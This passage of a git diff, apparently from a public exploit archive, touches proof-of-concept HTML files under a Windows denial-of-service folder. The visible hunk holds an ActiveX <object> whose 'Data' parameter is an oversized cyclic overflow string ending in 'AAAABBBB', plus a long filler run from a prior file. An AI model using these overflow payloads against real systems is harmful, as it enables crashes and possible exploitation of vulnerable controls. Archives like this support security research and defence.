xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"> -</object> +</object> \ No newline at end of file diff --git a/platforms/windows/dos/31178.html b/platforms/windows/dos/31178.html index 511427c1e..5204d69b1 100755 --- a/platforms/windows/dos/31178.html +++ b/platforms/windows/dos/31178.html @@ -37,4 +37,4 @@ Language : not found --> <object id=TestObj classid="CLSID:{2355C601-37D1-42B4-BEB1-03C773298DC8}" style="width:100;height:350"> <PARAM NAME="Data" VALUE="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6FAAAABBBB"> -</object> +</object> \ No newline at end of file diff --git a/platforms/windows/dos/3119.py b/platforms/windows/dos/3119.py index 